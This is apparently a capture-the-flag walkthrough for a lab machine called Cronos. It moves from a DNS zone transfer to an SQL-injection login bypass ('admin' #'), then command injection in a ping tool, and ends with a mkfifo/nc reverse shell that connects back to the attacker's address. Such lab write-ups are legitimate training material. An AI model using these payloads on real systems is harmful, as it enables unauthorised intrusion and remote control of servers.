3: port 53 (DNS)

# Reverse-lookup the target's own IP against its name server (10.10.10.13) to learn which domain it serves
$ nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

# Request a full zone transfer (AXFR). The server answers an unauthenticated client, i.e. it does not
# restrict AXFR to secondaries — a misconfiguration that leaks every record in the zone, including the
# otherwise unlinked admin.cronos.htb vhost. Two equivalent ways to do it are shown below (host -l and dig axfr).
$ host -l cronos.htb 10.10.10.13
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:

cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13

$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 248 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Aug 04 21:22:15 PDT 2021
;; XFR size: 7 records (messages 1, bytes 203)

# Add the discovered hostnames (cronos.htb, admin.cronos.htb, ns1.cronos.htb, www.cronos.htb) to /etc/hosts,
# all pointing at 10.10.10.13 (there is no public DNS for .htb), then browse each vhost by name.

http://admin.cronos.htb/
Login page

SQL-injection authentication bypass in the username field (from a standard cheatsheet):
admin' #
# The quote closes the string literal and `#` starts a MySQL-style comment, so the rest of the
# WHERE clause (the password check) is never evaluated and we are logged in as admin.
# That `#` is accepted as a comment suggests a MySQL/MariaDB backend. If the payload is ever
# sent in a URL query string, `#` must be encoded as %23 or the browser drops it as a fragment.

http://admin.cronos.htb/welcome.php
# The post-login page is "Net Tool v0.1", offering traceroute and ping against a user-supplied host.
# Pointing ping at our own tun0 address (10.10.16.161) and capturing ICMP with tcpdump confirms the
# server really runs the command with the input we provide:

$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
21:39:00.546026 IP cronos.htb > 10.10.16.161: ICMP echo request, id 15926, seq 1, length 64
21:39:00.546044 IP 10.10.16.161 > cronos.htb: ICMP echo reply, id 15926, seq 1, length 64

# The tool hands our input to a shell command. Test for OS command injection by chaining with `;` —
# if the host argument is interpolated unquoted into the command line, everything after the separator runs too.

traceroute 8.8.8.8;whoami;id;hostname
# Output returned by the page — command injection confirmed, running as the web-server user:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cronos

# Upgrade the injection to a reverse shell. The mkfifo/nc back-connect below needs nc on the target and a
# listener on our tun0 address 10.10.16.161:6969; the channel is plaintext, and it leaves /tmp/f behind — clean it up when done.
traceroute 8.8.8.8; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.13] 37930
bash: cannot set terminal process group (1372): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ whoami;id
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$
